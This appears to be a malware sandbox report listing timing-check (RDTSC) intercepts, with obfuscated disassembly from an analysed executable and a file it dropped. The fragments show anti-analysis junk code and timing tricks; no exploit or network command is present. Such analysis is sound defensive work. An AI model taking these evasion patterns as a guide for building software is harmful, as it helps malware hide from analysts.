Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCE4E3 second address: FCE4E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCE4E8 second address: FCE4EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCEABA second address: FCEADC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F0872h 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F8C7D0F0866h 0x0000000f jne 00007F8C7D0F0866h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCEADC second address: FCEAE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCEC3C second address: FCEC43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCEC43 second address: FCEC49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCEDAE second address: FCEDB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCEDB4 second address: FCEDB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCEDB8 second address: FCEDE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F0879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jno 00007F8C7D0F0866h 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007F8C7D0F0866h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCEDE7 second address: FCEDEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCEDEB second address: FCEDEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD2061 second address: FD2094 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8C7D0F21D9h 0x00000008 jmp 00007F8C7D0F21D3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 jc 00007F8C7D0F21CCh 0x00000017 jng 00007F8C7D0F21C6h 0x0000001d push eax 0x0000001e push edx 0x0000001f jnp 00007F8C7D0F21C6h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD2138 second address: FD2159 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8C7D0F0868h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8C7D0F0872h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD2159 second address: FD215F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD215F second address: FD21AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F0873h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F8C7D0F0868h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 mov edx, 2AEEAD54h 0x0000002b push 00000004h 0x0000002d add dh, 00000026h 0x00000030 push A77F3822h 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD21AF second address: FD21B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD23DE second address: FD23E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F8C7D0F0866h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD23E8 second address: FD2419 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F21D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e cmc 0x0000000f push dword ptr [ebp+122D1A77h] 0x00000015 mov edx, 1FA10CE7h 0x0000001a push EF180E08h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD2419 second address: FD241F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD241F second address: FD2424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56403E9 second address: 5640433 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 21F8683Ch 0x00000008 pushfd 0x00000009 jmp 00007F8C7D0F0875h 0x0000000e add esi, 2075D196h 0x00000014 jmp 00007F8C7D0F0871h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F8C7D0F086Dh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56404AB second address: 56404B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56404B1 second address: 56404B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56404B5 second address: 56404B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56404B9 second address: 56404D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8C7D0F086Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56404D4 second address: 56404D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56404D8 second address: 56404DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5640546 second address: 564054D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bl, EDh 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 564054D second address: 5640585 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov si, dx 0x00000012 pushfd 0x00000013 jmp 00007F8C7D0F086Dh 0x00000018 add si, 9DF6h 0x0000001d jmp 00007F8C7D0F0871h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5640585 second address: 564058F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 3BF0F132h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 564058F second address: 56405D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebp 0x0000000a pushad 0x0000000b mov si, dx 0x0000000e push ebx 0x0000000f pushfd 0x00000010 jmp 00007F8C7D0F086Ch 0x00000015 sbb ecx, 111B4648h 0x0000001b jmp 00007F8C7D0F086Bh 0x00000020 popfd 0x00000021 pop eax 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F8C7D0F0871h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56405D6 second address: 56405EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F21D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5640647 second address: 56406E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F0879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 613367F9h 0x0000000e jmp 00007F8C7D0F0877h 0x00000013 xor dword ptr [esp], 15D57BD1h 0x0000001a pushad 0x0000001b mov al, FAh 0x0000001d pushfd 0x0000001e jmp 00007F8C7D0F0871h 0x00000023 adc al, 00000046h 0x00000026 jmp 00007F8C7D0F0871h 0x0000002b popfd 0x0000002c popad 0x0000002d call 00007F8CEC8A41A6h 0x00000032 push 74DF27D0h 0x00000037 push dword ptr fs:[00000000h] 0x0000003e mov eax, dword ptr [esp+10h] 0x00000042 mov dword ptr [esp+10h], ebp 0x00000046 lea ebp, dword ptr [esp+10h] 0x0000004a sub esp, eax 0x0000004c push ebx 0x0000004d push esi 0x0000004e push edi 0x0000004f mov eax, dword ptr [74E80140h] 0x00000054 xor dword ptr [ebp-04h], eax 0x00000057 xor eax, ebp 0x00000059 push eax 0x0000005a mov dword ptr [ebp-18h], esp 0x0000005d push dword ptr [ebp-08h] 0x00000060 mov eax, dword ptr [ebp-04h] 0x00000063 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000006a mov dword ptr [ebp-08h], eax 0x0000006d lea eax, dword ptr [ebp-10h] 0x00000070 mov dword ptr fs:[00000000h], eax 0x00000076 ret 0x00000077 push eax 0x00000078 push edx 0x00000079 pushad 0x0000007a movsx edx, ax 0x0000007d pushfd 0x0000007e jmp 00007F8C7D0F0874h 0x00000083 adc al, 00000018h 0x00000086 jmp 00007F8C7D0F086Bh 0x0000008b popfd 0x0000008c popad 0x0000008d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56406E2 second address: 56406E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56406E8 second address: 5640781 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [ebp-04h], 00000000h 0x0000000c jmp 00007F8C7D0F0877h 0x00000011 mov edx, dword ptr [ebp+0Ch] 0x00000014 pushad 0x00000015 mov ecx, 572107CBh 0x0000001a popad 0x0000001b mov esi, edx 0x0000001d pushad 0x0000001e mov cx, dx 0x00000021 mov dl, 56h 0x00000023 popad 0x00000024 mov al, byte ptr [edx] 0x00000026 pushad 0x00000027 jmp 00007F8C7D0F086Ch 0x0000002c pushfd 0x0000002d jmp 00007F8C7D0F0872h 0x00000032 jmp 00007F8C7D0F0875h 0x00000037 popfd 0x00000038 popad 0x00000039 inc edx 0x0000003a jmp 00007F8C7D0F086Eh 0x0000003f test al, al 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F8C7D0F0877h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5640781 second address: 5640781 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F21D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F8C7D0F2140h 0x0000000f mov al, byte ptr [edx] 0x00000011 pushad 0x00000012 jmp 00007F8C7D0F21CCh 0x00000017 pushfd 0x00000018 jmp 00007F8C7D0F21D2h 0x0000001d jmp 00007F8C7D0F21D5h 0x00000022 popfd 0x00000023 popad 0x00000024 inc edx 0x00000025 jmp 00007F8C7D0F21CEh 0x0000002a test al, al 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F8C7D0F21D7h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56407BA second address: 56407BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56407BE second address: 56407C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56407C2 second address: 56407C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56407C8 second address: 56407CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56407CE second address: 56407D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56407D2 second address: 5640804 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F21D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edi, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 call 00007F8C7D0F21CBh 0x00000016 pop ecx 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5640804 second address: 564082B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F0874h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 dec edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8C7D0F086Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 564082B second address: 564082F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 564082F second address: 5640835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5640835 second address: 5640864 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8C7D0F21CCh 0x00000009 sub ax, 2EA8h 0x0000000e jmp 00007F8C7D0F21CBh 0x00000013 popfd 0x00000014 push ecx 0x00000015 pop ebx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 lea ebx, dword ptr [edi+01h] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5640864 second address: 5640868 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5640868 second address: 564086E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 564086E second address: 5640887 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C7D0F0875h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5640887 second address: 5640912 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F21D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov al, byte ptr [edi+01h] 0x0000000e jmp 00007F8C7D0F21CEh 0x00000013 inc edi 0x00000014 pushad 0x00000015 mov bx, E0B0h 0x00000019 popad 0x0000001a test al, al 0x0000001c pushad 0x0000001d mov esi, ebx 0x0000001f pushfd 0x00000020 jmp 00007F8C7D0F21D1h 0x00000025 adc ecx, 55292C36h 0x0000002b jmp 00007F8C7D0F21D1h 0x00000030 popfd 0x00000031 popad 0x00000032 jne 00007F8CEC89A35Fh 0x00000038 pushad 0x00000039 mov edi, esi 0x0000003b pushad 0x0000003c mov cl, 5Ah 0x0000003e push ebx 0x0000003f pop ecx 0x00000040 popad 0x00000041 popad 0x00000042 mov ecx, edx 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F8C7D0F21D8h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5640912 second address: 5640932 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 call 00007F8C7D0F086Dh 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e shr ecx, 02h 0x00000011 pushad 0x00000012 mov esi, ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5640932 second address: 564095B instructions: 0x00000000 rdtsc 0x00000002 call 00007F8C7D0F21D5h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b rep movsd 0x0000000d rep movsd 0x0000000f rep movsd 0x00000011 rep movsd 0x00000013 rep movsd 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F8C7D0F21CAh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 564095B second address: 564096D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C7D0F086Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 564096D second address: 5640A25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, edx 0x0000000a pushad 0x0000000b mov dx, 5DC0h 0x0000000f popad 0x00000010 and ecx, 03h 0x00000013 pushad 0x00000014 pushad 0x00000015 push edx 0x00000016 pop eax 0x00000017 mov bx, 7EEEh 0x0000001b popad 0x0000001c movsx ebx, cx 0x0000001f popad 0x00000020 rep movsb 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F8C7D0F21CCh 0x00000029 add si, EF38h 0x0000002e jmp 00007F8C7D0F21CBh 0x00000033 popfd 0x00000034 mov edx, esi 0x00000036 popad 0x00000037 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000003e jmp 00007F8C7D0F21D2h 0x00000043 mov eax, ebx 0x00000045 jmp 00007F8C7D0F21D0h 0x0000004a mov ecx, dword ptr [ebp-10h] 0x0000004d pushad 0x0000004e mov ecx, 2121CE9Dh 0x00000053 mov eax, 1CD1B799h 0x00000058 popad 0x00000059 mov dword ptr fs:[00000000h], ecx 0x00000060 pushad 0x00000061 jmp 00007F8C7D0F21D2h 0x00000066 mov cx, 8041h 0x0000006a popad 0x0000006b pop ecx 0x0000006c push eax 0x0000006d push edx 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007F8C7D0F21D6h 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5640A25 second address: 5640A29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5640A29 second address: 5640A2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5640A2F second address: 5640A35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5640A35 second address: 5640A39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5640A39 second address: 5640A55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8C7D0F0870h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5640A55 second address: 5640647 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov bx, si 0x00000009 popad 0x0000000a pop esi 0x0000000b pushad 0x0000000c push esi 0x0000000d mov ax, di 0x00000010 pop edi 0x00000011 popad 0x00000012 pop ebx 0x00000013 jmp 00007F8C7D0F21CAh 0x00000018 leave 0x00000019 pushad 0x0000001a mov dl, ch 0x0000001c mov bh, 2Fh 0x0000001e popad 0x0000001f retn 0008h 0x00000022 cmp dword ptr [ebp-2Ch], 10h 0x00000026 mov eax, dword ptr [ebp-40h] 0x00000029 jnc 00007F8C7D0F21C5h 0x0000002b push eax 0x0000002c lea edx, dword ptr [ebp-00000590h] 0x00000032 push edx 0x00000033 call esi 0x00000035 push 00000008h 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a movsx edx, ax 0x0000003d pushfd 0x0000003e jmp 00007F8C7D0F21D6h 0x00000043 add esi, 4743B098h 0x00000049 jmp 00007F8C7D0F21CBh 0x0000004e popfd 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5640B47 second address: 5640B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5640B4B second address: 5640B68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F21D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5640B68 second address: 5640B99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007F8C7D0F086Dh 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F8C7D0F0876h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5640B99 second address: 5640B9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5640B9D second address: 5640BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5640BA3 second address: 5640BB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C7D0F21CDh 0x00000009 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: DAEAE2 second address: DAEAE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F291FB second address: F29200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F29200 second address: F2920C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F8C7D0F0866h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F2920C second address: F29210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F29210 second address: F2926D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C7D0F0875h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jns 00007F8C7D0F0880h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F8C7D0F0879h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F2926D second address: F29273 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F29273 second address: F2928F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F8C7D0F086Fh 0x0000000b jp 00007F8C7D0F0866h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F28449 second address: F28469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 jmp 00007F8C7D0F21D5h 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F285CE second address: F285E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jns 00007F8C7D0F0868h 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F285E4 second address: F285E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F285E8 second address: F28600 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8C7D0F0866h 0x00000008 jnp 00007F8C7D0F0866h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jg 00007F8C7D0F0872h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
